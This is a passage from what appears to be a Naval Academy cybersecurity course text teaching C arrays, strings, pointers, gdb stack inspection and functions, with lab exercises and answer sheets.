work midshipman@EC310:~ $ cp ec310code/sx4c.c work If all went well, you should have a copies of sx4a.c , sx4b.c and sx4c.c in your work directory. Verify that you have sx4a.c , sx4b.c and sx4c.c in your work directory by changing to the work directory: cd work and then listing the files in the work directory: ls. If you do not have sx4a.c , sx4b.c and sx4c.c in in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 2. 10 ECE: The Caring Department. 109 Part 2: Fun with Navy You should now be in the work directory: Examine the program sx4a.c using nano. The C program is shown below: Who am I? #include<stdio.h> #include<string.h> int main( ) { char school[ 5 ] ; school[ school[ school[ school[ school[ 0 1 2 3 4 ] ] ] ] ] = = = = = ‘N’ ‘a’ ‘v’ ‘y’ 0 ; ; ; ; ; printf( "%s\n" , school ); } Save your program ( Control-o ) and exit nano ( Control-x) and then compile your program using gcc –g sx4a.c and then run your program ./a.out to confirm it executes as expected. If your program is not working STOP and ask your instructor for help. Otherwise, proceed to Part 3. Part 3: Wa? Now, using nano change the line char school[ 5 ] ; to read char school[ 10 ] ; and rerun your program. Question 1: What effect did this modification have on your program’s output. Explain. Now, we would like to modify our program so that it prints out: Wavy instead of Navy. Change one line of code in your program to accomplish this. Do not use strcpy for this question. Verify your solution works. Question 2: What change did you make to your program? 110 Now change the line school[ 2 ] = ‘v’ ; to read school[ 2 ] = 0 ; (Note that the line of code contains the number zero, not the letter oh.) Question 3: What output is produced? Why is this output produced? Now, change the line school[ 2 ] = 0 ; back to its original form: school[ 2 ] = ‘v’ ; but change the array declaration line char school[ 10 ] ; to read instead: char school[ 2 ] ; So, we are telling C that we intend that our character string only have two characters (and remember, one of them should be the NULL character. Run the program. Question 4: What was printed out? Did the program realize you only wanted the array to have two items? Explain. If you feel very confident in your answer to Question 4, go on to Part 4. Otherwise, STOP and ask your instructor for help. Part 4: Out of Bounds Examine the program sx4b.c using nano. The C program is shown below: #include <stdio.h> #include <string.h> int main() { int count[3] = { 1 , 2 , 3 }; int j; for ( j = 1 ; j <= 3 ; j = j + 1 ) { printf("The next number is %d\n" , } count[j] ); } Compile and run the program. Question 5: What was printed out? Explain. Question 6: How would you fix the program so that it prints out: The next number is 1 The next number is 2 The next number is 3 Make this fix to your code and have your instructor verify that your program works properly. After you have Question 6 signed off, proceed to Part 5. 111 UNIX Tips and Tricks UNIX provides another feature to lessen the amount of typing that busy midshipmen have to perform. UNIX attempts to complete our commands for us, using a feature called tab completion. To use tab completion, you type in part of a command, and then hit the tab key. UNIX will attempt to complete the command for you (or may partially complete the command). For example, suppose I have been editing the file smith_4_1.c, and have opened and closed this file several times already. If I now type: midshipman@EC310-VM:~ $ nano s and then hit the Tab key, UNIX will automatically complete the command for me: midshipman@EC310-VM:~ $ nano smith_4_1.c Similarly, I find that if I type midshipman@EC310-VM:~ $ ./a and then hit the Tab key, UNIX will automatically complete the command for me: midshipman@EC310-VM:~ $ ./a.out Tab completion is very useful. Keep in mind that if UNIX cannot decide how to complete your command (since you have not provided enough characters to start with), enter another character or two and press Tab again. Part 5: Joys of strcpy Examine the program sx4c.c using nano. The C program is shown below: #include <stdio.h> #include <string.h> int main() { char slogan[16] = "Cyber 2 is fun!" ; printf("\n%s\n\n" , slogan ); } Compile and run the program. Question 7: Why did I choose to make the array size equal to 16. There are only 15 characters in the string Cyber 2 is fun! Carefully add the following two lines to your program above, right before the closing brace. strcpy( slogan , "Cyber rocks!" ); printf("\n%s\n\n" , slogan ); Compile and run the program. Question 8: What was printed out? Explain. Your friend is confused. He looks at the length of the two strings: C y b e r 2 i s f u n ! - - - - - - - - - - - - - - C y b e r r o c k s ! and wonders why the second item printed out wasn't Cyber rocks!un!. In other words, he wonders what happened to the un! that finished the string Cyber 2 is fun!, since those last few characters were not overwritten. Question 9: What is the answer to your friend's question? Explain. 112 Security Exercise 4 Answer Sheet Name: Question 1: Question 2: Question 3: Question 4: Question 5: Question 6: __________________________ Instructor/Lab Tech signature Question 7: Question 8: Question 9: 113 114 Chapter 5: Intro to Pointers Objectives: (a) Explain the operation of the address operator. (b) Describe the relationships that exist between pointers, arrays and strings. (c) Differentiate between the value of a pointer and the address of a pointer. Let me give you some pointers for passing EC310: 0x0335a438 0x0826d210 0x0447ab36 Ha ha ha ha ... ha… er… ha? 1. Pointers 1.1. Why Use Pointers? Consider your favorite database: MIDS. Suppose you tell the registrar that you want to register for the following courses: HU222: HH333: FP444: EC310: Football Theory History of Embarrassing Air Force Scandals Cicero’s Impact on Renaissance Poetry as Developed for Theatre circa 1700 Cyber Security II Now, other people also have to use (and possibly modify) your record in the MIDS database. Your advisor has to check that you are on track for your major. Your instructors have to enter grades into your record. The Dean may have to annotate your matrix with a note saying that one course counts for another course. Various people may have to enter conduct offenses. So, let’s say that it comes time for your HU222 instructor to enter your six-week grade. How can this be accomplished? Recall that the MIDS database, as with everything else a computer uses, resides in memory. One option would be for the registrar to send your HU222 instructor a copy of the entire MIDS database, with a note: “Update the database, and then send it back to me.” This involves the duplication and movement of vast amounts of data. Can you think of a better way? A better way would be to let the instructor modify the actual database… not a copy of the database. But how can that be done? Suppose your instructor was given the address of the MIDS database in memory. Then, any changes made to the contents of a memory location are actual changes to the MIDS database! In other words, instead of sending someone the MIDS database, we simply tell them: "Here is the address of the MIDS database, go make your changes directly". 1.2. Addresses Recall from week one of the course that all variables have a type a name (also called an identifier) a value (possibly a garbage value) an address 115 We will focus on this notion of a variable’s address. Addresses are 4 bytes (32 bits) long. Since people don’t like reading 32bit binary numbers… Hey! I like reading 32-bit binary numbers!!! CORRECTION…since most people don’t like reading 32-bit binary numbers, the shorthand hexadecimal notation is used. As mentioned previously, memory locations are usually given in hexadecimal notation. Practice Problem 5.1 If the first byte of a variable is stored at memory location numbered: 00000000000100101111111101111100 what is this address in hexadecimal notation? Solution: 0000 0000 0001 0010 1111 1111 0111 1100 Practice Problem 5.2 For our x86 architecture, how many hexadecimal digits are in an address? Solution: 1.3. The address operator & & (the ampersand sign) is the address operator which is used to access the address of a variable. &variable returns the address of variable. So, if we have a variable named y, then &y returns the address of y. To examine how the ampersand operator behaves, consider the program below, along with its associated output. Recall: %d is used for integers %x is used for hexadecimal #include<stdio.h> int main() { int current_year = 2014; printf("\nThe year is %d and the address is %x \n" current_year, &current_year); } 116 , 1.4. Assigning Values to Pointers A pointer is a variable that holds a memory address, usually the address of another variable. Put another way, a pointer is a data type that holds the hexadecimal address of another variable. Put a third way: A pointer variable “points to” another variable. A pointer variable is itself stored in 4 bytes. Declaring Pointers A pointer variable is declared by using the asterisk. For example, the declaration data_type *pointer_name ; means: "I am declaring a pointer named pointer_name that will point to another variable of type data_type". For example, consider the declaration float *a_ptr ; What does this mean? It means that we have told C that we would like to have a pointer variable named a_ptr that will be used to point to some float variable (but it does not point anywhere yet!). Assigning Values to Pointers. Recall that a pointer variable holds an address. To assign the correct address to a pointer variable, we use the & operator (the address operator). Let's consider the code snippet below: int a = 131; int *a_ptr ; a_ptr = &a; Let's look at this code snippet line-by-line. The very first line (int a = 131;) tells the compiler that you want to use a variable named a, of type integer, that will be initialized to the value of 131. The compiler will place the value of a on the program's stack (recall that the stack is the section of memory that a program has available to hold its variables and any other data it needs to perform its operation). The operating system (not you, the programmer) will decide the precise address of where the variable a will be placed. Let's presume that the compiler has chosen to store the variable a at address 0056DE73. The second line of code (int *a_ptr;) tells the compiler that you want to use a pointer variable named a_ptr, that will (at some time later in its life), point to variable of type int. This variable must also be stored on the stack. Let's presume that the compiler has chosen to store the variable a_ptr at address 0056DA61. 117 Finally, the third line of code (a_ptr = &a;) places the address of a into the variable a_ptr. Practice Problem 5.3 Consider the program shown below, along with its corresponding output. #include<stdio.h> int main() { int a = 4; int *a_ptr; a_ptr = &a; printf("\nThe value of a is %d and the address is %x \n" , a , &a ); printf("\nThe value of a_ptr is %x and the address is %x \n\n", a_ptr , &a_ptr) ; } In the picture shown below: (a) Fill in the two red circles. (b) Draw an arrow showing where a_ptr is stored on the stack. (c) Annotate the figure to show the value of a_ptr. 118 Pointers are confusing! Some argue that pointers are the greatest source of bugs in C programs. In fact, some modern programming languages (such as Java) have eliminated pointers altogether since pointers are so confusing and lead to so many errors. But it is precisely because pointers are confusing that leads to their use by adversaries. Almost all program attacks involve the use or abuse of a pointer. The Morris worm… Conficker… Stuxnet… these all employ a buffer overflow attack. The key to understanding this attack involves understanding pointers. 1.5. Arrays and Pointers Recall our discussion of arrays from last lecture. We mentioned that if we declare an array with float pay[4]; the compiler will reserve four consecutive memory location, each of which will hold a float variable. The four variables are pay[0] , pay[1] , pay[2] and pay[3]. The array of all four variables is named pay. Recall also that in the C programming language, strings—i.e., sequences of characters—are stored as arrays of characters. Here is an example of declaring a string variable using a character array: char school[20] = "US Naval Academy"; The array named school holds 17 characters: school[0] school[1] school[2] school[3] = = = = 'U' 'S' ' ' 'N' etc., etc., school[16] = 0 So… we can see what school[1] is (it’s a character… the character 'S' to be exact), but what exactly is the array name school by its lonesome…without an index? Let's see! #include<stdio.h> int main() { char school[20] = "US Naval Academy" ; printf("\nThe value of school is %x \n\n" } 119 , school ) ; We have output an address…school was holding an address… school is a pointer. The bottom line is: An array name is a pointer! When we declare an array, C generates a pointer, which is assigned the address of the first element of the array. Consider the declaration int a [4]; What really happens is: int *a = &a[0]; a[0] 11 a points here a[1] a[2] a[3] For strings, we can tell C to print out a string by using the array name and the string format specifier. If we changed our program to: #include<stdio.h> int main() { char school[20] = " US Naval Academy" ; printf("\nThe value of school is %s \n\n" , school ) ; } Only change! The old x is changed to an s. then the output would be: Practice Problem 5.4 Recall that in RAM you have stored the machine language code for your program as well as additional memory allocated for your variables within the program. This latter additional memory is called the stack. You type into the debugger the command i r ebp and get the result 0xbffff818. The register ebp points to the "bottom" of the stack. Upon further review of the assembly code you determine that two strings are stored in memory, one at address ebp-40 and the other at ebp-24. (Note that the numbers 40 and 24 are ordinary base 10 numbers, not base-16.) What are the two hidden words? Solution: ebp 11 bffff818 It should be pointed out that this is not a line of valid C code. Our meaning is to convey: It’s as if this happened… 120 Practice Problem 5.5 A large program contains the following lines of code int a = 11; int b[2]; b[0] = 10; b[1] = 6; A section of this program's stack is shown below. Address 0xBFFFF8F0 0xBFFFF8F1 0xBFFFF8F2 0xBFFFF8F3 0xBFFFF8F4 0xBFFFF8F5 0xBFFFF8F6 0xBFFFF8F7 0xBFFFF8F8 0xBFFFF8F9 0xBFFFF8FA 0xBFFFF8FB 0xBFFFF8FC 0xBFFFF8FD 0xBFFFF8FE 0xBFFFF8FF 0xBFFFF900 0xBFFFF901 0xBFFFF902 Data 0x3E 0x 3F 0x 4A 0x 0A 0x 00 0x 00 0x 00 0x 06 0x 00 0x 00 0x 00 0x 0B 0x 00 0x 00 0x 00 0x 4D 0x 08 0x 2C 0x 33 What would be the result of the statement: printf(“The address of array b is %x \n”, b); Solution: Practice Problem 5.6 Recall that in RAM you have stored the object code for your program as well as additional memory allocated for your variables within the program. You type into the debugger the command: i r ebp and get the result 0xbffff810. Upon further review of the assembly code you determine that two integers are stored in memory, one at address ebp-8 and the other at ebp+4. What are the hidden decimal numbers? 121 An Aside Why does scanf sometimes require an ampersand in front of the variable's name and sometimes not? Recall that scanf is another name for the keyboard. When the writers of the C programming language designed the scanf statement, the intent was that the item into which the keyboard input is placed would be provided as an address. What does that mean? That means that when we have a scanf statement, such as scanf("%f" , &year_number ); the place where we deposit the keyboard input, shown as a red box in the statement above, must be an address. That is simply the way the C language was written. So if we declare a variable of, say, type float as in float EC310_factor ; and we want to read in the value of the EC310_torture_factor from the keyboard, we cannot do this: scanf("%f" , EC310_factor ); Error! Bad! The reason we cannot do this is because EC310_torture_factor is not an address, and the scanf statement always expects that you will provide it an address into which to deposit the keyboard input. So, we can place the value read in from the keyboard into the variable EC310_torture_factor by providing the address of EC310_torture_factor using the address operator: scanf("%f" , &EC310_torture_factor ); Correct! Good! Knowing how the scanf statement was designed should provide insight into how strings are entered from the keyboard. Last lecture that we mentioned that when entering strings from the keyboard, you don’t use the ampersand: &. For example, to enter a midshipman's last name from the keyboard, we would use: char mid_name[24] ; scanf( "%s " , mid_name ); Note: No ampersand in front of mid_name ! The reason: Recall from Section 1.5 above that an array name is a pointer—when we declare an array, C generates a pointer, which is assigned the address of the first element of the array. So, in this particular case, mid_name is an address already, so we do not add the ampersand! OPTIONAL: For your reading and viewing pleasure, here is an example of a “buffer overflow attack”. We will discuss the buffer overflow in greater detail, but for now, let's just watch a Pre-Snowden video: http://www.cbsnews.com/video/watch/?id=7400904n (first 6-7 minutes) 122 Problems 1. Examine the program char_array.c which already exists in the booksrc directory. (a) How does a program know it has reached the end of a string? (b) How many more characters could legitimately fit into this particular string? 2 Given the string declaration below, mark each strcpy()function call as Safe (S) if the string literal can be safely stored in the array, or Unsafe (U) if the string literal cannot be stored safely in the array. The array is declared as: char President[8]; (a) (b) (c) (d) 3. strcpy( strcpy( strcpy( strcpy( President President President President , , , , "Monroe\n"); "Polk\t"); "Cleveland\n"); "Garfield"); Given the following variable declarations: int foo; char *bar; and the following memory layout (all values in hexadecimal and little endian): bar foo 080483A0 080483A4 080483A8 080483AC 42 4F A0 05 52 21 83 DB 41 00 04 66 56 00 08 72 What is the value of: (a) &foo (in hex) (b) foo (in decimal) (c) bar (in hex) (d) &bar (in hex) (e) If we were to print out the string named bar what would be printed out? 4. Given the following declarations, what would be the C statement to assign ptr_age the address of the integer age? (Circle the correct answer) int int (a) (b) (c) (d) (e) 5. age; *ptr_age; &ptr_age = &age; *ptr_age = &age; &ptr_age = *age; ptr_age = age; ptr_age = &age; Given the following C snippet, what would the output of the printf statement be? char name[40] = “LCDR Atwood”; char *ptr1; char *ptr2; ptr1=name; ptr2=ptr1 + 6; strcpy(ptr2,”good day by all!”); printf(“My teacher is %s\n”, name); 123 124 Security Exercise 5 Part 1: Initial Setup Who am I? Your instructors have prewritten two C programs that you will use for this lab, and have placed them in the ec310code directory. The two programs you will use today are named sx5a.c and sx5b.c . Copy these two files from the ec310code directory to the work directory by carefully entering the following two lines at the home directory prompt: midshipman@EC310:~ $ cp ec310code/sx5a.c work midshipman@EC310:~ $ cp ec310code/sx5b.c work Make sure you are at your home directory! Enter this! If all went well, you should have copies of sx5a.c and sx5b.c in your work directory. Verify that you have sx5a.c and sx5b.c in your work directory by changing to the work directory: cd work and then listing the files in the work directory: ls If you do not have sx5a.c and sx5b.c in in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 2. Part 2: Go Navy You should now be in the work directory: Examine the program sx5a.c using nano. The C program is shown below: #include<stdio.h> #include<string.h> int main( ) { char phrase[ 10 ] = "Go Navy!" ; printf( "%s\n" , phrase ); } Save your program ( Control-o ) and exit nano ( Control-x) and then compile your program using gcc –g sx5a.c and then run your program: ./a.out . If your program is not working as expected STOP and ask your instructor for help. Otherwise, proceed to Part 3. 125 Part 3: Memory The array named phrase is a string, and the contents of this string are stored in main memory on the program's stack. We would like to determine the starting address of the string. By using nano, change only a single character in statement printf( "%s\n" , phrase ); to determine the main memory address of where the string named phrase begins. Compile and execute your program. Question 1: What was the single character you changed? Question 2: How many bytes of memory are required to hold a single character? Question 3: Looking at your source code, what character should be stored at phrase[ 1 ] ? Question 4: Looking at your source code, what character should be stored at phrase[ 8 ] ? Question 5. Complete the printf statement that would allow you to see the address of the character stored at phrase[1] (don't actually make the change using nano, just state what you would do): printf( "The address of phrase[1] is %x " , ______________ ) ; Question 6: Sketch how your array should be stored in memory in the picture shown on your answer sheet. Each box represents a byte in memory. Assume that the array named phrase points to the location shown, and that memory locations are increasing going down the page. For this question all you need to do is fill in the ASCII characters that are stored in each memory location. If, in answering Question 1 above, you made a modification to your program, restore the program to its original form as shown on the prior page. Carefully modify your C program (using nano) so that it contains the three new lines shown in bold italics: #include<stdio.h> #include<string.h> int main( ) { char phrase[ 10 ] = "Go Navy!" ; Add these two lines. (You can also add blank lines around these two new lines if you wish.) char *ptr; ptr = phrase; printf( "%s\n" , phrase ); printf( "%s\n" , ptr ); Add this line. (Also add blank lines if you wish.) } Compile and execute your program, examining the output. If your program is not compiling STOP and ask your instructor for help. Otherwise, proceed to Part 4. 126 Part 4: Go Navy Navy Recall that phrase, the name of an array, is really a pointer to an array of characters. In fact, phrase holds the address of the first element of the array. And the variable ptr is also a pointer. Question 7: The line of code ptr = phrase; is an assignment statement. What is being assigned to what? Question 8: Explain your program's output. Carefully modify your C program so that it contains the three new lines shown in bold italics: #include<stdio.h> #include<string.h> int main( ) { char phrase[ 10 ] = "Go Navy!" ; char *ptr; ptr = phrase; Add this line. char *another_ptr; printf( "%s\n" , phrase ); printf( "%s\n" , ptr ); another_ptr = ptr + 3 ; printf( "%s\n" , another_ptr ); } Add these two lines. Compile and execute your program. If your program is not compiling STOP and ask your instructor for help. Otherwise, proceed to Part 5. Part 5: Army Strikes Back Question 9: Explain your program's output. Question 10: In the same sketch as Question 6, fill in: the location where ptr points to. the location where another_ptr points to. Carefully modify your C program to add the two new lines shown in bold italics (do not worry about the presence or absence of blank lines in your code): #include<stdio.h> #include<string.h> int main( ) { char phrase[ 10 ] = “Go Navy!” ; char *ptr; ptr = phrase; char *another_ptr; printf( "%s\n" , phrase ); printf( "%s\n" , ptr ); another_ptr = ptr + 3 ; printf( "%s\n" , another_ptr ); strcpy( another_ptr , "Army!" ); printf( "%s\n" , ptr ); } 127 Add these two lines. Recall that the strcpy command provides a means for changing the values of the characters stored in a string. Ensure that you use strcpy to change another_ptr , not ptr (see the code above). Note that we then, in the last line of code, use ptr in the printf command. Compile and execute your program, examining the output. Question 11: Explain the last line of output produced by the program. Specifically, why did the value of the string named ptr change (as reflected by the last line of output) when all you did using the strcpy command was change a different string (the string named another_ptr). Phrasing this question another way: Your program above never directly changes ptr after the line ptr = phrase; but—somehow—the value printed out by the last line reflects a change. What caused this? If you are baffled, STOP and ask your instructor for an explanation. Otherwise, proceed to Part 6. Part 6: Autopsy of the Program Recall that when we execute a program, it is moved from secondary memory (e.g., the hard disk) to main memory (RAM). The particular program's machine language code is moved into main memory, and the program is also given additional space in main memory (called the stack) that it can use to store variable values that it needs to execute. In the figure shown below, the machine language code has been moved into main memory starting at address 0x08048374 and the program's stack is between memory locations 0xbfffff71 and 0xbfffff73. Note that our program is not "stored in the CPU." Rather, the program is stored in main memory. The CPU can interact with the program via the three registers that we have learned about: The eip register holds the address of the next instruction that will be executed (but has not yet been executed). The esp register points to the "top" of the stack. 128 The ebp register points to the bottom of the stack. Note in the figure above the values of the eip, esp and ebp registers. Now, the gdb debugger can be thought of as a microscope that allows us to examine in detail the CPU registers and memory. We have seen that we can use the info command to examine registers. For example, in the context of the figure above, if I entered i r eip I should obtain the value of 0x08048374. Similarly, if I entered x/xb 0x08048374 I should see the value 0x55. We will examine a program using the debugger, and show in particular how we can use the names of pointer variables in debugger commands. And at the end of this Security Exercise (no peeking!) we will show you a useful enhancement to the examine command. Enough of program sx5a.c . I'm sure you are sick of that program! Let's move on to sx5b.c !!! Using nano examine the program sx5b.c . The C program is shown below: #include<stdio.h> #include<string.h> int main( ) { char phrase[ 10 ] = "Go Navy!" ; char *ptr; ptr = phrase; char *another_ptr; printf( "%s\n" , phrase ); printf( "%s\n" , ptr ); another_ptr = ptr + 3 ; printf( "%s\n" , another_ptr ); strcpy( another_ptr , "Army!" ); printf( "%s\n" , ptr ); 129 } Note that this is the same program that you left off with, but we have cleaned it up (e.g., to remove unnecessary blank lines). DO NOT MAKE ANY CHANGES TO THIS PROGRAM! Let’s use the debugger to examine the program on prior page a bit more closely. Type the following at the prompt. Do not type the comments! gcc –g sx5b.c // The –g provides extra functionality for the debugger. gdb –q // Recall that gdb is the name of the debugger. ./a.out set dis intel // This displays the assembly code in standard Intel lingo list // This repeats the source code for convenience <Enter> // Just hit the Enter key. This displays the remainder of your source code break 13 // This sets a “breakpoint” at line 13. This is the next to last line of your // program – the line that uses strcpy. run // This starts executing the program up to the breakpoint. After entering all of these commands, your program will have executed up to but not including line 13. Line 13 is the next to last line of your program – the line that uses strcpy. Let's find out the address that phrase holds (remember, the name of an array such as phrase holds the address of the first element in the array). We would also like to know actual contents of this address. Let’s do this by typing x/xb phrase You should see: (gdb) x/xb phrase 0xbffff800: 0x47 (Note: You may see a number slightly different from 0xbffff800, but you should see the value of 0x47. If you do not see the value of 0x47 then STOP and ask your instructor for help.) Let's explain the command you just entered. Recall that the first x invokes the examine command, the second x specifies hexadecimal, and the b asks the debugger to display a single-byte quantity. When the examine command is used with array names or pointer variables (such as phrase, ptr and another_ptr), the first item returned will be the contents of the pointer and the second item returned will be the value that the pointer is pointing to. (gdb) x/xb phrase 0xbffff800: 0x47 The address stored in phrase. The memory contents of this specific address. Question 12. Fill in the picture shown on the answer sheet, showing the contents of phrase, and the hexadecimal value stored in the memory location pointed to by phrase. (Note that this figure will be gradually filled in as we complete this lab; for this question, you are only being asked to show the contents of phrase, and the value stored in the memory location pointed to by phrase.) Question 13. What on earth does that 0x47 represent? Question 14. Determine what is stored at the memory location that phrase contains by examining the memory directly using the command: x/xb 0xbffff800 130 Question 15. On the same figure as Question 12, fill in the contents of ptr and another_ptr. These are both pointers so your answers should be addresses. Question 16. On the same figure as Question 12, draw arrows showing where phrase, ptr and another_ptr all point to; i.e., draw an arrow from the pointer to the memory location with the corresponding address. Question 17. On the same figure as Question 12, show the hexadecimal values stored in the memory locations pointed to by these three pointers phrase, ptr and another_ptr. Question 18. The pointer named another_ptr seems to be pointing to the value 0x4e. What is that? Question 19. On the same figure as Question 12, fill in the addresses of each byte of main memory depicted on the figure (placing the address to the left of the byte), and fill in the contents of each memory location as ASCII characters. You should do this by using the debugger to examine memory one byte at a time. For example, if I wanted to examine the memory location 0xbffff801 I would enter x/xb 0xbffff801 When you have completed your picture, STOP and show it to your instructor. If correct, you can proceed to Part 7. Part 7: Further Autopsy of the Program Recall that our program has executed up to but not including line 13. Line 13 is the next to last line of your program – the line that uses strcpy. Now, execute the program (using nexti ) until you show line 14 as the next instruction to execute. In other words, keep entering nexti until you see: 14 printf( "%s\n" , ptr ); It should be the case that you have to enter nexti four times to see the line shown above. Question 20. Fill in the picture shown on the answer sheet in its entirety, showing the memory address of all bytes, the contents of all bytes (as ASCII characters) and the contents of the pointers. Now, the C line of code: printf( "%s\n" , ptr ); goes to the memory address pointed to by ptr, and starts printing out characters in memory, one after another, until a NULL is reached. Question 21. What will be printed out by the next statement (printf( ptr ); )? Question 22. You friend is confused. He says: “We never made any changes involving ptr – we only made changes to another_ptr (using the strcpy command).” So, why did we get different results when we executed the line printf( ptr ); ? How do you reply? We can type out multiple bytes with a single x/xb command by specifying the number of bytes to display. For example, we can print out a single byte starting at the address pointed to by phrase by typing x/xb phrase But, if we want to see, say, 8 bytes of data starting at the address pointed to by phrase, we can type x/8xb phrase Question 23. Explain the meaning of the results that you see when you enter x/8xb phrase. 131 Question 24. Explain the meaning of the results that you see when you enter x/8c phrase. 132 Security Exercise 5 Answer Sheet Name: _____________________ Question 1: Question 2: Question 3: Question 4: Question 5: Question 6 and Question 10: Question 7: Question 8: Question 9: Question 11: 133 Question 12, Question 15, Question 16, Question 17, Question 19 Question 13: Question 14: Question 18: Question 20: Question 21: Question 22: Question 23: Question 24: 134 Chapter 6: Functions and the Stack Objectives: (a) Demonstrate the ability to analyze simple programs using functions. (b) Describe the organization and contents of a program’s stack throughout the program’s execution. (c) Demonstrate the ability to examine the stack values of a running program. 1. Functions 1.1. Introduction It is often best to solve a large problem by successively decomposing it into smaller and smaller subproblems until the subproblems are easy enough to directly implement in C. C facilitates this process by providing a mechanism for building up a large program from small subprograms called functions. A large complicated program can be constructed by combining a number of smaller programs (functions), each of which performs specific simple tasks. To use a function we must invoke it with a function call. The function call specifies: the function name the arguments—i.e., the inputs—provided to the function The syntax for a function call is: function_name ( argument_1, argument_2, ..., argument_n) Again, the arguments are the inputs to the function. Functions might (and often do) have only one argument. In fact, some functions have no arguments! If a function has arguments, the arguments can be numbers, variables or more complicated expressions. The value a function computes is called the return value. The return value can be thought of as the output of a function. Functions can only have at most one return value. Many functions have no return value. This probably all sounds a bit vague, so let's look at a concrete example. Suppose there was a function named sqrt, used to determine the square root of a number. In the statement y = sqrt( x ) ; the variable x is the function’s argument (input) and sqrt( x ) is the function call. The value computed by the function is the function’s output, or return value. For example, if x has the value 9.0, then the function’s return value is 3.0, and this value is placed into the variable y. Functions promote the writing of good programs. If we have to solve a large problem, we successively decompose the large problem into smaller sub-problems until the sub-problems are easy to directly implement as statements in the C programming language. Once we have finished dividing a large problem into individual sub-problems, we write small programs – called functions – to solve each of these individual subtasks. 135 1.2. User-Defined Functions C has predefined functions which we can use, but we can also write our own functions. Functions we write ourselves are called user-defined functions. To use our own functions, we must write the code that permits the function to perform its required task. The Function Definition The function definition describes how the function accomplishes its task. A function definition is a small program. When we call the function, we run this small program. The syntax is: data type of the result returned by the function the data type of parameter_1 the data type of parameter_n type_returned function_name( type_1 { body of the function } parameter_1 , … , type_n parameter_n ) Arguments vs. Parameters In a function call, the inputs to the function are called the arguments. These values of the arguments are plugged in for the parameters in the function definition before the body of the function is executed. A parameter should be thought of as a placeholder that “stands in” for an argument. The person writing the function may not know the names chosen for the arguments, so he just picks his own parameter names that will serve to stand in for the arguments. The return Statement The return statement consists of the keyword return followed by an expression. The value of the expression is what is returned to the statement which called the function. In other words, the value of the expression after the return keyword is the function’s output. The function ends when the return statement executes. An Extended Example Suppose a person wants to write a function that calculates the absolute value of an integer. Utilizing the if-else statement which you learned in Chapter 3, the absolute value of an integer (given the name number in the program snippet below) can be calculated as: if(number >= 0) { AV = number; } else { AV = -1 * number; } If we had a function named AbsVal( x ) which returns the absolute value of a given integer, x, we could write the program as: #include <stdio.h> int main() { int x, y; printf("Enter an integer: "); scanf("%d" , &x ); y = AbsVal(x); printf("The absolute value of the integer is %d\n" , y); } Problem: The program above will not work because there is no built-in function named AbsVal, so we’ll define one. 136 The following program will work: #include <stdio.h> int AbsVal( int number) { int AV; if(number >=0) { AV = number; } else { AV = -1*number; } return AV; } int main() { int x, y; printf("Enter an integer: "); scanf("%d" , &x ); y = AbsVal(x); printf("The absolute value of the integer is %d\n" , y); } The program above starts executing at the line of code that has the word main in it. The next line declares the variables x and y, and since they are not initialized, they have random garbage values. #include <stdio.h> int AbsVal( int number) { int AV; if(number >=0) { AV = number; } else { AV = -1*number; } return AV; } Garbage values! int main() { int x, y; The program starts here. x -149248 printf("Enter an integer: "); scanf("%d" , &x ); y = AbsVal(x); printf("The absolute value of the integer is %d\n" , y); 137 y 23972 } When the user is prompted to enter an integer, let’s say that he enters the value -5. This value is then placed in the variable x. #include <stdio.h> int AbsVal( int number) { int AV; if(number >=0) { AV = number; } else { AV = -1*number; } return AV; } Garbage value! int main() { int x, y; printf("Enter an integer: "); scanf("%d" , &x ); x -5 23972 y y = AbsVal(x); printf("The absolute value of the integer is %d\n" , y); } Now we reach the line with the function call ( y = AbsVal(x); ) . The program jumps to the first line of the function named AbsVal . #include <stdio.h> int AbsVal(int number) { int AV; if(number >=0) { AV = number; } else { AV = -1*number; } return AV; } int main() { int x, y; x -5 y 23972 printf("Enter an integer: "); scanf("%d" , &x ); When we reach this line…we jump to the function! y = AbsVal(x); printf("The absolute value of the integer is %d\n" , y); } 138 And the value of the argument x is plugged into the parameter number . #include <stdio.h> int AbsVal( int number) { int AV; if(number >=0) { AV = number; } else { AV = -1*number; } return AV; } number -5 A copy of the value of x (in this case -5) is placed in the parameter named number. int main() { int x, y; x -5 y 23972 printf("Enter an integer: "); scanf("%d" , &x ); y = AbsVal(x); printf("The absolute value of the integer is %d\n" , y); } Now the function declares its own variable named AV which initially has a garbage value, but is set equal to 5 in the else statement. #include <stdio.h> int AbsVal( int number) { int AV; if(number >=0) { AV = number; } else { AV = -1*number; } return AV; } number AV -5 AV -944001 AV is changed from a garbage value to 5. 5 int main() { int x, y; printf("Enter an integer: "); scanf("%d" , &x ); x -5 y y = AbsVal(x); printf("The absolute value of the integer is %d\n" , y); 139 23972 } Now, when we reach the return statement ( return AV; ) , we jump back to the original function call and the value of AV (which is 5) is placed in the variable y. #include <stdio.h> int AbsVal( int number) { int AV; if(number >=0) { AV = number; } else { AV = -1*number; } return AV; } number -5 AV 5 int main() { int x, y; printf("Enter an integer: "); scanf("%d" , &x ); y = AbsVal(x); x -5 y 5 printf("The absolute value of the integer is %d\n" , y); } 1.3. void functions Functions that produce no values for the rest of the program to use are called void functions. A common example: We want a function to send a message or some output to the screen. The output is sent to the screen, but is not sent back for use in the rest of the program. The syntax for the function definition of a void function is then: void function_name(type_1 parameter_1,… , type_n { body of the function return ; } parameter_n) The function call would be simply function_name(argument_1, … , argument_n); So, there are three key differences between the syntax of void functions and the syntax of other functions: keyword void is used instead of a return type. the return statement in the function definition does not contain any expression to be returned. In fact, the return statement can be entirely omitted. The function call is not used as the right side of an assignment statement. We can rewrite our earlier example, using a void function, called output, to provide this output value. This is shown on the next page. The function named output will be used to replace the printf statement that displays your absolute value. 140 #include <stdio.h> int AbsVal( int number) { int AV; if(number >=0) { AV = number; } else { AV = -1*number; } return AV; } Note the new function named output. void output( int Abs_Num ) { printf("The absolute value of the integer is %d\n" , Abs_Num); } int main() { int x, y; printf("Enter an integer: "); The function named output is called here. The value of the argument y is plugged into the parameter Abs_Num . scanf("%d" , &x ); y = AbsVal(x); output(y); } 1.4. The main function Would you believe that you have been using functions all along! In fact, main is a function. It is a very special function in that all programs begin executing at the main function. Practice Problem 6.1 Circle the appropriate words to complete the statements below. Each set of bold terms separated with a slash indicates that you should select one of the choices. To use a function we must invoke it with a return value / function call / prototype. The values / parameters / arguments are the inputs to a function. A value / parameter / argument is a placeholder that “stands in” for a value / parameter / argument. The result from a function is called the return value / function call / prototype. Solution: To use a function we must invoke it with a return value / function call / prototype. The values / parameters / 